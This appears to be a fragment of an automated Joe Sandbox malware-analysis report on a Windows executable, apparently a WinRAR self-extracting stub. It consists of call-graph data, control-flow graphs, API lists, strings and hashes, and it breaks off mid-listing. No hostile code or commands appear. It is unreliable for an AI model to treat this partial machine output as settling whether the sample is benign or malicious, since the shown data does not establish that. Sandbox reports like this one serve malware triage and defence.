22050->22052 22107 7ff6ef6b2c84 70 API calls 22050->22107 22052->22039 22054 7ff6ef6b4723 22052->22054 22057 7ff6ef6b478c 22054->22057 22058 7ff6ef6b4c1a 22054->22058 22060 7ff6ef6b4913 22057->22060 22064 7ff6ef6b479e 22057->22064 22059 7ff6ef6be6a0 31 API calls 22058->22059 22065 7ff6ef6b4c29 22059->22065 22111 7ff6ef6be5f8 74 API calls 22060->22111 22062 7ff6ef6b4815 22063 7ff6ef6b552c swprintf 47 API calls 22062->22063 22066 7ff6ef6b482d 22063->22066 22064->22062 22069 7ff6ef6b4879 22064->22069 22074 7ff6ef6b4362 22064->22074 22065->22074 22116 7ff6ef6b2e60 126 API calls 4 library calls 22065->22116 22108 7ff6ef6b5354 70 API calls 22066->22108 22069->22074 22109 7ff6ef6c4674 8 API calls BuildCatchObjectHelperInternal 22069->22109 22071 7ff6ef6b48df 22110 7ff6ef6c44e0 8 API calls memcpy_s 22071->22110 22072 7ff6ef6b4930 22075 7ff6ef6b4d35 22072->22075 22078 7ff6ef6b4b39 22072->22078 22074->22033 22118 7ff6ef6d69a4 8 API calls 22075->22118 22077 7ff6ef6b4d3a 22079 7ff6ef6b4b6c 22078->22079 22112 7ff6ef6b2e60 126 API calls 4 library calls 22078->22112 22081 7ff6ef6b4b72 22079->22081 22084 7ff6ef6b4b82 22079->22084 22113 7ff6ef6b2d5c 10 API calls 22081->22113 22086 7ff6ef6b4b7d 22084->22086 22114 7ff6ef6c0b80 74 API calls BuildCatchObjectHelperInternal 22084->22114 22086->22074 22115 7ff6ef6b28f4 70 API calls 2 library calls 22086->22115 22087->21572 22090 7ff6ef6c0c70 22089->22090 22091 7ff6ef6c0bf3 22089->22091 22093 7ff6ef6b19f4 74 API calls 22090->22093 22096 7ff6ef6c0c52 22090->22096 22092 7ff6ef6b19f4 74 API calls 22091->22092 22091->22096 22094 7ff6ef6c0c23 22092->22094 22095 7ff6ef6c0c7a 22093->22095 22119 7ff6ef6b775c 22094->22119 22098 7ff6ef6bccf0 79 API calls 22095->22098 22096->22041 22098->22096 22099->22074 22100->22074 22102->22049 22103->22049 22104->22049 22105->22049 22106->22074 22109->22071 22110->22074 22111->22072 22112->22079 22113->22086 22114->22086 22115->22074 22116->22074 22118->22077 22120 7ff6ef6b776d 22119->22120 22121 7ff6ef6b7782 22120->22121 22123 7ff6ef6c2d78 8 API calls 2 library calls 22120->22123 22121->22096 22123->22121 22125 7ff6ef6b730e 22124->22125 22226 7ff6ef6b71a8 22125->22226 22127 7ff6ef6b7373 22127->21588 22128 7ff6ef6b7335 22128->22127 22231 7ff6ef6bec30 22128->22231 22133 7ff6ef6bf18a _snwprintf 22130->22133 22131 7ff6ef6d6760 _handle_error 8 API calls 22132 7ff6ef6bf300 22131->22132 22132->21590 22133->22131 22135 7ff6ef6ba315 22134->22135 22136 7ff6ef6ba353 22135->22136 22251 7ff6ef6b8dfc 70 API calls 22135->22251 22136->21600 22136->21602 22136->21606 22138 7ff6ef6ba346 22252 7ff6ef6b145c 70 API calls 2 library calls 22138->22252 22141 7ff6ef6ba7d1 _snwprintf 22140->22141 22142 7ff6ef6bc204 101 API calls 22141->22142 22162 7ff6ef6ba962 22141->22162 22144 7ff6ef6ba859 22142->22144 22143 7ff6ef6d6760 _handle_error 8 API calls 22145 7ff6ef6ba98c 22143->22145 22144->22162 22253 7ff6ef6b89f4 72 API calls 22144->22253 22145->21619 22147 7ff6ef6ba885 22148 7ff6ef6bd48c 11 API calls 22147->22148 22149 7ff6ef6ba88d 22148->22149 22150 7ff6ef6ba8ae 22149->22150 22151 7ff6ef6bd4a0 11 API calls 22149->22151 22150->22162 22255 7ff6ef6b145c 70 API calls 2 library calls 22150->22255 22152 7ff6ef6ba899 22151->22152 22152->22150 22254 7ff6ef6b27a0 70 API calls 2 library calls 22152->22254 22155 7ff6ef6ba914 22156 7ff6ef6bd250 20 API calls 22155->22156 22159 7ff6ef6ba929 22156->22159 22157 7ff6ef6ba8cb 22157->22155 22256 7ff6ef6bd538 56 API calls 3 library calls 22157->22256 22160 7ff6ef6bc204 101 API calls 22159->22160 22161 7ff6ef6ba95e 22160->22161 22161->22162 22257 7ff6ef6b89f4 72 API calls 22161->22257 22162->22143 22165 7ff6ef6bc96e GetFileType 22164->22165 22166 7ff6ef6bb761 22164->22166 22165->22166 22166->21642 22212 7ff6ef6b28f4 70 API calls 2 library calls 22166->22212 22168 7ff6ef6bcb94 78 API calls 22167->22168 22169 7ff6ef6bcb69 22168->22169 22170 7ff6ef6bcb6d SetEndOfFile 22169->22170 22171 7ff6ef6bcb8c 22169->22171 22172 7ff6ef6bceb0 78 API calls 22170->22172 22171->21661 22172->22171 22174 7ff6ef6bcf04 22173->22174 22176 7ff6ef6bcf14 22173->22176 22175 7ff6ef6bcf0a FlushFileBuffers 22174->22175 22174->22176 22175->22176 22177 7ff6ef6bcf7e SetFileTime 22176->22177 22177->21679 22178->21581 22179->21601 22180->21591 22181->21595 22183->21630 22184->21630 22185->21630 22186->21630 22187->21630 22188->21613 22189->21612 22190->21610 22191->21612 22193 7ff6ef6bc237 22192->22193 22194 7ff6ef6bd48c 11 API calls 22193->22194 22206 7ff6ef6bc245 22194->22206 22195 7ff6ef6bc2b7 22196 7ff6ef6bc688 11 API calls 22195->22196 22198 7ff6ef6bc2d3 22195->22198 22196->22198 22197 7ff6ef6bd250 20 API calls 22201 7ff6ef6bc2f8 22197->22201 22198->22197 22209 7ff6ef6bc2d7 22198->22209 22203 7ff6ef6bc30e 22201->22203 22204 7ff6ef6bc2fd 22201->22204 22202 7ff6ef6bc256 22202->22206 22258 7ff6ef6bc338 85 API calls 3 library calls 22202->22258 22261 7ff6ef6bd408 11 API calls 2 library calls 22203->22261 22207 7ff6ef6bc688 11 API calls 22204->22207 22206->22195 22206->22202 22208 7ff6ef6bd48c 11 API calls 22206->22208 22206->22209 22259 7ff6ef6c64fc 14 API calls 2 library calls 22206->22259 22260 7ff6ef6b8a3c RtlPcToFileHeader RaiseException _com_raise_error 22206->22260 22207->22209 22208->22206 22209->21619 22211->21632 22212->21640 22214->21665 22215->21665 22216->21667 22217->21665 22218->21665 22219->21672 22220->21674 22221->21675 22222->21684 22223->21677 22224->21600 22225->21600 22239 7ff6ef6b704c 22226->22239 22228 7ff6ef6b71e5 22228->22128 22230 7ff6ef6b704c 9 API calls 22230->22228 22232 7ff6ef6bec4d _snwprintf 22231->22232 22234 7ff6ef6becbf __vcrt_InitializeCriticalSectionEx 22232->22234 22237 7ff6ef6bec99 __vcrt_InitializeCriticalSectionEx 22232->22237 22248 7ff6ef6c6b64 22232->22248 22235 7ff6ef6d6760 _handle_error 8 API calls 22234->22235 22236 7ff6ef6bed44 22235->22236 22236->22128 22237->22234 22238 7ff6ef6c6b64 CompareStringW 22237->22238 22238->22234 22240 7ff6ef6b7068 _snwprintf 22239->22240 22241 7ff6ef6bf17c 8 API calls 22240->22241 22247 7ff6ef6b7093 22241->22247 22242 7ff6ef6b7175 22243 7ff6ef6d6760 _handle_error 8 API calls 22242->22243 22244 7ff6ef6b7185 22243->22244 22244->22228 22244->22230 22245 7ff6ef6bf17c 8 API calls 22245->22247 22246 7ff6ef6bec30 9 API calls 22246->22247 22247->22242 22247->22245 22247->22246 22249 7ff6ef6c6b86 22248->22249 22250 7ff6ef6c6bbb CompareStringW 22249->22250 22250->22237 22251->22138 22252->22136 22253->22147 22254->22150 22255->22157 22256->22155 22257->22162 22258->22202 22259->22206 22260->22206 22261->22209 22263 7ff6ef6c0d7f 22262->22263 22269 7ff6ef6be23c 83 API calls 22263->22269 22265 7ff6ef6c0e15 22270 7ff6ef6be23c 83 API calls 22265->22270 22267 7ff6ef6c0e21 22268->21691 22269->22265 22270->22267 22272 7ff6ef6bc12c 22271->22272 22274 7ff6ef6bc0f2 22271->22274 22273 7ff6ef6bc101 22276 7ff6ef6bd408 11 API calls 2 library calls 22273->22276 22274->22272 22274->22273 22276->22274 22278 7ff6ef6d0aec 4 API calls 22277->22278 22279 7ff6ef6d0aca 22278->22279 22280 7ff6ef6d0ad9 22279->22280 22289 7ff6ef6d0b24 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 22279->22289 22280->21148 22280->21149 22282->21150 22283->21160 22285 7ff6ef6d0afe 22284->22285 22286 7ff6ef6d0b03 22284->22286 22290 7ff6ef6d0b78 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 22285->22290 22286->21160 22288->21163 22289->22280 22290->22286 22291->21171 22293 7ff6ef6bd0bc 78 API calls 22292->22293 22294 7ff6ef6b231e 22293->22294 22295 7ff6ef6b2322 22294->22295 22296 7ff6ef6b1ccc 126 API calls 22294->22296 22295->21181 22295->21182 22297 7ff6ef6b2330 22296->22297 22297->22295 22299 7ff6ef6b145c 70 API calls 2 library calls 22297->22299 22299->22295 23085 7ff6ef6d6ff0 32 API calls 2 library calls 23086 7ff6ef6bc5e0 76 API calls 23088 7ff6ef6e0fe0 15 API calls 23089 7ff6ef6b29d8 31 API calls __std_exception_copy 23042 7ff6ef6e08dc 52 API calls __free_lconv_num 23090 7ff6ef6ea3d8 RtlUnwindEx __GSHandlerCheck_SEH __GSHandlerCheckCommon 23091 7ff6ef6eafd2 LeaveCriticalSection abort 23043 7ff6ef6d08d0 GdipAlloc 22460 7ff6ef6e03d0 22467 7ff6ef6e005c 22460->22467 22462 7ff6ef6e03d5 22463 7ff6ef6e38a8 abort LeaveCriticalSection 22462->22463 22464 7ff6ef6e03e0 22463->22464 22465 7ff6ef6e03ec 22464->22465 22466 7ff6ef6e0408 11 API calls 22464->22466 22466->22465 22468 7ff6ef6e18e0 abort 35 API calls 22467->22468 22469 7ff6ef6e0067 22468->22469 22472 7ff6ef6e14a8 35 API calls abort 22469->22472 23092 7ff6ef6e51d0 GetProcessHeap 22474 7ff6ef6d57cb 22475 7ff6ef6d56d3 22474->22475 22476 7ff6ef6d61d0 std::_Xinvalid_argument 14 API calls 22475->22476 22476->22475 22997 7ff6ef6d56c7 14 API calls std::_Xinvalid_argument 23046 7ff6ef6b2cc0 100 API calls _handle_error 23093 7ff6ef6b19c0 87 API calls

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 0 7ff6ef6c5008-7ff6ef6c505c call 7ff6ef6d6bd0 GetModuleHandleW 3 7ff6ef6c505e-7ff6ef6c5071 GetProcAddress 0->3 4 7ff6ef6c50b3-7ff6ef6c53ac 0->4 7 7ff6ef6c5073-7ff6ef6c5082 3->7 8 7ff6ef6c508b-7ff6ef6c509e GetProcAddress 3->8 5 7ff6ef6c53b2-7ff6ef6c53bb call 7ff6ef6dfc08 4->5 6 7ff6ef6c54a6-7ff6ef6c54de GetModuleFileNameW call 7ff6ef6bff38 call 7ff6ef6c4ce8 4->6 5->6 15 7ff6ef6c53c1-7ff6ef6c5405 GetModuleFileNameW CreateFileW 5->15 21 7ff6ef6c54e1-7ff6ef6c54eb call 7ff6ef6beb40 6->21 7->8 8->4 9 7ff6ef6c50a0-7ff6ef6c50b0 8->9 9->4 17 7ff6ef6c549d-7ff6ef6c54a0 CloseHandle 15->17 18 7ff6ef6c540b-7ff6ef6c541e SetFilePointer 15->18 17->6 18->17 20 7ff6ef6c5420-7ff6ef6c5442 ReadFile 18->20 20->17 22 7ff6ef6c5444-7ff6ef6c5452 20->22 28 7ff6ef6c5520-7ff6ef6c5548 call 7ff6ef6bffc4 GetFileAttributesW 21->28 29 7ff6ef6c54ed-7ff6ef6c54f8 call 7ff6ef6c4f90 21->29 24 7ff6ef6c5458-7ff6ef6c546e 22->24 25 7ff6ef6c5706-7ff6ef6c570b call 7ff6ef6d69a4 22->25 27 7ff6ef6c547f-7ff6ef6c5494 call 7ff6ef6c49e0 24->27 39 7ff6ef6c5470-7ff6ef6c547c call 7ff6ef6c4f90 27->39 40 7ff6ef6c5496 27->40 41 7ff6ef6c555e 28->41 42 7ff6ef6c554a 28->42 29->28 38 7ff6ef6c54fa-7ff6ef6c551e CompareStringW 29->38 38->28 43 7ff6ef6c5551-7ff6ef6c555a 38->43 39->27 40->17 44 7ff6ef6c5561-7ff6ef6c5564 41->44 42->43 43->21 46 7ff6ef6c555c 43->46 47 7ff6ef6c55a7-7ff6ef6c55aa 44->47 48 7ff6ef6c5566-7ff6ef6c5569 44->48 46->44 50 7ff6ef6c55b0-7ff6ef6c55c6 call 7ff6ef6bff8c call 7ff6ef6beb40 47->50 51 7ff6ef6c56db-7ff6ef6c5705 call 7ff6ef6d6760 47->51 52 7ff6ef6c556d-7ff6ef6c5595 call 7ff6ef6bffc4 GetFileAttributesW 48->52 64 7ff6ef6c563f-7ff6ef6c567a call 7ff6ef6b552c AllocConsole 50->64 65 7ff6ef6c55c8-7ff6ef6c563a call 7ff6ef6c4f90 * 2 call 7ff6ef6c2948 call 7ff6ef6b552c call 7ff6ef6c2948 call 7ff6ef6d0d94 50->65 60 7ff6ef6c55a4 52->60 61 7ff6ef6c5597-7ff6ef6c55a0 52->61 60->47 61->52 63 7ff6ef6c55a2 61->63 63->47 70 7ff6ef6c56d2-7ff6ef6c56d4 ExitProcess 64->70 71 7ff6ef6c567c-7ff6ef6c56cc GetCurrentProcessId AttachConsole call 7ff6ef6dbb78 GetStdHandle WriteConsoleW Sleep FreeConsole 64->71 65->70 71->70
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Console$HandleModule$AddressAttributesNameProcProcessswprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemVersionWrite
                                                                                                                                            • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                                                                            • API String ID: 2569216850-2013832382
                                                                                                                                            • Opcode ID: 83a22a6426816d11a286af88b89cc0ecc99be97fd8948fd6c2f908e0dfb38e53
                                                                                                                                            • Instruction ID: 5a40b1cfcb5b9ad1cdaa3b934bb43dc22b39b555001e9f3fd6cc5e42f4521abf
                                                                                                                                            • Opcode Fuzzy Hash: 83a22a6426816d11a286af88b89cc0ecc99be97fd8948fd6c2f908e0dfb38e53
                                                                                                                                            • Instruction Fuzzy Hash: D512CB37A05B429BEB219F20EC402E933ACFB44758F501236D95D8A7A4EF3EE658D345

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 84 7ff6ef6d23f0-7ff6ef6d244f call 7ff6ef6d6bd0 call 7ff6ef6b13d0 89 7ff6ef6d2455-7ff6ef6d245b 84->89 90 7ff6ef6d2fcd 84->90 92 7ff6ef6d2461-7ff6ef6d2463 89->92 93 7ff6ef6d2c39-7ff6ef6d2c59 call 7ff6ef6d47ec 89->93 91 7ff6ef6d2fd0-7ff6ef6d2ff2 call 7ff6ef6d6760 90->91 96 7ff6ef6d2465-7ff6ef6d246b 92->96 97 7ff6ef6d2476-7ff6ef6d2478 92->97 102 7ff6ef6d2c5b-7ff6ef6d2c66 SendMessageW 93->102 103 7ff6ef6d2c6c-7ff6ef6d2c76 93->103 100 7ff6ef6d24dc-7ff6ef6d24e3 96->100 101 7ff6ef6d246d-7ff6ef6d246f 96->101 97->91 104 7ff6ef6d257d-7ff6ef6d25a2 GetDlgItemTextW 100->104 105 7ff6ef6d24e9-7ff6ef6d24f0 100->105 106 7ff6ef6d2471-7ff6ef6d2474 101->106 107 7ff6ef6d24b8-7ff6ef6d24c6 101->107 102->103 112 7ff6ef6d2c93-7ff6ef6d2d45 GetDlgItem SendMessageW call 7ff6ef6d0b5c GetDlgItem SetWindowTextW call 7ff6ef6d11a0 call 7ff6ef6d1ab4 103->112 113 7ff6ef6d2c78-7ff6ef6d2c8d SendDlgItemMessageW 103->113 108 7ff6ef6d25a4-7ff6ef6d25b5 104->108 109 7ff6ef6d25cc-7ff6ef6d25d3 104->109 105->104 114 7ff6ef6d24f6-7ff6ef6d251c call 7ff6ef6c2948 SetDlgItemTextW 105->114 106->97 115 7ff6ef6d247d-7ff6ef6d24a1 call 7ff6ef6c2948 call 7ff6ef6b12b4 106->115 110 7ff6ef6d24d5-7ff6ef6d24d7 107->110 111 7ff6ef6d24c8-7ff6ef6d24cf 107->111 116 7ff6ef6d25bb 108->116 117 7ff6ef6d25e3-7ff6ef6d25ff GetDlgItem 109->117 118 7ff6ef6d25d5-7ff6ef6d25de 109->118 119 7ff6ef6d25be-7ff6ef6d25c7 EndDialog 110->119 111->90 111->110 155 7ff6ef6d2d5c-7ff6ef6d2d63 112->155 156 7ff6ef6d2d47-7ff6ef6d2d57 call 7ff6ef6d353c 112->156 113->112 133 7ff6ef6d2522-7ff6ef6d2529 114->133 115->90 142 7ff6ef6d24a7-7ff6ef6d24b3 115->142 116->119 125 7ff6ef6d2601-7ff6ef6d2627 SendMessageW * 2 117->125 126 7ff6ef6d262d-7ff6ef6d263d SetFocus 117->126 124 7ff6ef6d2b67-7ff6ef6d2b6e 118->124 119->90 124->116 129 7ff6ef6d2b74-7ff6ef6d2b76 124->129 125->126 131 7ff6ef6d264e-7ff6ef6d268f call 7ff6ef6c4ce8 call 7ff6ef6d44a4 call 7ff6ef6c2948 call 7ff6ef6b552c 126->131 132 7ff6ef6d263f-7ff6ef6d2644 call 7ff6ef6c2948 126->132 129->116 135 7ff6ef6d2b7c-7ff6ef6d2bd7 call 7ff6ef6c2948 SetDlgItemTextW call 7ff6ef6c2948 call 7ff6ef6c4ce8 129->135 151 7ff6ef6d2696-7ff6ef6d26a4 call 7ff6ef6d4568 131->151 143 7ff6ef6d2649-7ff6ef6d264c 132->143 133->90 138 7ff6ef6d252f-7ff6ef6d2536 133->138 187 7ff6ef6d2c15-7ff6ef6d2c34 call 7ff6ef6c2948 call 7ff6ef6d0d94 135->187 188 7ff6ef6d2bd9-7ff6ef6d2be0 135->188 138->90 144 7ff6ef6d253c-7ff6ef6d2550 GetMessageW 138->144 150 7ff6ef6d2fc4-7ff6ef6d2fc7 SetDlgItemTextW 142->150 143->151 144->90 152 7ff6ef6d2556-7ff6ef6d2565 IsDialogMessageW 144->152 150->90 168 7ff6ef6d26b2-7ff6ef6d26ba 151->168 169 7ff6ef6d26a6-7ff6ef6d26ad call 7ff6ef6d4d68 151->169 152->133 153 7ff6ef6d2567-7ff6ef6d257b TranslateMessage DispatchMessageW 152->153 153->133 161 7ff6ef6d2d65-7ff6ef6d2d92 call 7ff6ef6c2948 SetDlgItemTextW call 7ff6ef6c2948 SetDlgItemTextW 155->161 162 7ff6ef6d2d98-7ff6ef6d2d9f 155->162 156->155 161->162 170 7ff6ef6d2da5-7ff6ef6d2dc1 call 7ff6ef6d353c 162->170 171 7ff6ef6d2e7e-7ff6ef6d2e85 162->171 179 7ff6ef6d26bc-7ff6ef6d26ca call 7ff6ef6bd48c 168->179 180 7ff6ef6d26d8-7ff6ef6d26ef call 7ff6ef6bd250 168->180 169->168 198 7ff6ef6d2dc3-7ff6ef6d2dca 170->198 199 7ff6ef6d2df8-7ff6ef6d2dfe 170->199 172 7ff6ef6d2f3e-7ff6ef6d2f45 171->172 173 7ff6ef6d2e8b-7ff6ef6d2e92 171->173 182 7ff6ef6d2f52-7ff6ef6d2f59 172->182 183 7ff6ef6d2f47-7ff6ef6d2f4c EnableWindow 172->183 173->172 181 7ff6ef6d2e98-7ff6ef6d2e9f 173->181 179->180 212 7ff6ef6d26cc-7ff6ef6d26d3 call 7ff6ef6d15bc 179->212 205 7ff6ef6d2702-7ff6ef6d2713 call 7ff6ef6d122c 180->205 206 7ff6ef6d26f1-7ff6ef6d26ff GetLastError 180->206 181->172 192 7ff6ef6d2ea5-7ff6ef6d2eb2 181->192 194 7ff6ef6d2f5b-7ff6ef6d2f74 call 7ff6ef6b1384 * 2 182->194 195 7ff6ef6d2f79-7ff6ef6d2f81 182->195 183->182 187->90 188->187 197 7ff6ef6d2be2-7ff6ef6d2c10 call 7ff6ef6dbb78 call 7ff6ef6c2948 call 7ff6ef6b552c 188->197 202 7ff6ef6d2eb8-7ff6ef6d2ebe 192->202 194->195 208 7ff6ef6d2f83-7ff6ef6d2f8a 195->208 209 7ff6ef6d2fac-7ff6ef6d2fb3 195->209 197->187 198->199 211 7ff6ef6d2dcc-7ff6ef6d2df3 call 7ff6ef6d0298 call 7ff6ef6dbe38 198->211 203 7ff6ef6d2e00-7ff6ef6d2e0f call 7ff6ef726190 199->203 204 7ff6ef6d2e6c-7ff6ef6d2e79 call 7ff6ef6d353c 199->204 215 7ff6ef6d2ec0-7ff6ef6d2ec7 202->215 216 7ff6ef6d2ec9-7ff6ef6d2ecf 202->216 203->204 239 7ff6ef6d2e11-7ff6ef6d2e18 203->239 204->171 241 7ff6ef6d2724-7ff6ef6d272c 205->241 242 7ff6ef6d2715-7ff6ef6d2721 GetLastError 205->242 206->205 208->209 220 7ff6ef6d2f8c-7ff6ef6d2f9c 208->220 209->90 223 7ff6ef6d2fb5-7ff6ef6d2fc2 call 7ff6ef6c2948 209->223 211->199 212->180 215->216 228 7ff6ef6d2f0d-7ff6ef6d2f15 215->228 230 7ff6ef6d2ede-7ff6ef6d2f08 call 7ff6ef6c4ca4 call 7ff6ef6c2948 call 7ff6ef6c4ca4 216->230 231 7ff6ef6d2ed1-7ff6ef6d2ed8 216->231 234 7ff6ef6d2f9e-7ff6ef6d2fa4 SendMessageW 220->234 235 7ff6ef6d2fa6 call 7ff6ef7261c0 220->235 223->150 228->202 246 7ff6ef6d2f17-7ff6ef6d2f39 call 7ff6ef6d0298 228->246 230->228 231->230 240 7ff6ef6d2eda-7ff6ef6d2edc 231->240 234->209 235->209 239->204 248 7ff6ef6d2e1a-7ff6ef6d2e36 call 7ff6ef6d353c 239->248 240->202 249 7ff6ef6d272e-7ff6ef6d2731 241->249 250 7ff6ef6d279a-7ff6ef6d279d 241->250 242->241 246->172 248->204 267 7ff6ef6d2e38-7ff6ef6d2e5e DialogBoxParamW 248->267 256 7ff6ef6d2733-7ff6ef6d2777 GetTickCount call 7ff6ef6b552c call 7ff6ef6bc564 call 7ff6ef6bc688 249->256 257 7ff6ef6d27ab-7ff6ef6d27b3 249->257 253 7ff6ef6d27a3-7ff6ef6d27a5 250->253 254 7ff6ef6d2a24-7ff6ef6d2a99 call 7ff6ef6b13a8 * 2 call 7ff6ef6c2948 SetDlgItemTextW call 7ff6ef6b13a8 SetDlgItemTextW GetDlgItem 250->254 253->257 260 7ff6ef6d29bb-7ff6ef6d2a1f call 7ff6ef6c2948 call 7ff6ef6b552c call 7ff6ef6b8c9c call 7ff6ef6c2948 call 7ff6ef6d0d94 253->260 306 7ff6ef6d2ac1-7ff6ef6d2b24 call 7ff6ef6d353c * 2 call 7ff6ef6d4c78 call 7ff6ef6d353c 254->306 307 7ff6ef6d2a9b-7ff6ef6d2abb GetWindowLongPtrW SetWindowLongPtrW 254->307 291 7ff6ef6d2788-7ff6ef6d278f call 7ff6ef6bc5ac 256->291 292 7ff6ef6d2779-7ff6ef6d2785 GetLastError 256->292 262 7ff6ef6d29b2-7ff6ef6d29b5 257->262 263 7ff6ef6d27b9-7ff6ef6d2884 GetModuleFileNameW call 7ff6ef6c3748 call 7ff6ef6b552c CreateFileMappingW 257->263 262->110 262->260 287 7ff6ef6d292a 263->287 288 7ff6ef6d288a-7ff6ef6d289a GetCommandLineW 263->288 267->204 273 7ff6ef6d2e60 267->273 273->204 294 7ff6ef6d292f-7ff6ef6d2960 ShellExecuteExW call 7ff6ef6c39a4 * 2 287->294 295 7ff6ef6d28b1-7ff6ef6d2928 call 7ff6ef6d1ee0 * 3 call 7ff6ef6c37e8 MapViewOfFile call 7ff6ef6d8950 288->295 296 7ff6ef6d289c-7ff6ef6d28ac call 7ff6ef6c4ce8 288->296 305 7ff6ef6d2794 291->305 292->291 318 7ff6ef6d2962-7ff6ef6d2971 WaitForInputIdle 294->318 319 7ff6ef6d2998 294->319 295->294 296->295 305->250 336 7ff6ef6d2b4d-7ff6ef6d2b61 call 7ff6ef6b1384 306->336 337 7ff6ef6d2b26-7ff6ef6d2b2d 306->337 307->306 322 7ff6ef6d2974-7ff6ef6d2977 318->322 323 7ff6ef6d299b-7ff6ef6d299e 319->323 326 7ff6ef6d298b-7ff6ef6d2996 322->326 327 7ff6ef6d2979-7ff6ef6d2989 Sleep 322->327 323->262 328 7ff6ef6d29a0-7ff6ef6d29ac UnmapViewOfFile CloseHandle 323->328 326->323 327->322 327->326 328->262 336->124 337->336 338 7ff6ef6d2b2f-7ff6ef6d2b36 337->338 338->336 340 7ff6ef6d2b38-7ff6ef6d2b48 call 7ff6ef6d353c 338->340 340->336
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Item$MessageText$Send$Windowswprintf$File$DialogErrorLast$LoadLongStringView$CloseCommandCountCreateDispatchEnableExecuteFocusHandleIdleInputLineMappingModuleNameParamShellSleepTickTranslateUnmapWaitwcscpy
                                                                                                                                            • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$p$runas$winrarsfxmappingfile.tmp
                                                                                                                                            • API String ID: 3949765048-4012663800
                                                                                                                                            • Opcode ID: 469945c3df918f4ac9347a7c8e9f7e944882380b4926574b273706e04d0c3fbb
                                                                                                                                            • Instruction ID: 7d798e5fdfe4beb07c27a0ed428115e9eea43162d875b5fe0024222d5086c3bd
                                                                                                                                            • Opcode Fuzzy Hash: 469945c3df918f4ac9347a7c8e9f7e944882380b4926574b273706e04d0c3fbb
                                                                                                                                            • Instruction Fuzzy Hash: FA62A16BE0C64387FF10AB21E8503B92369AF85784F500435D84DC7AA6DE3FA519D74B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
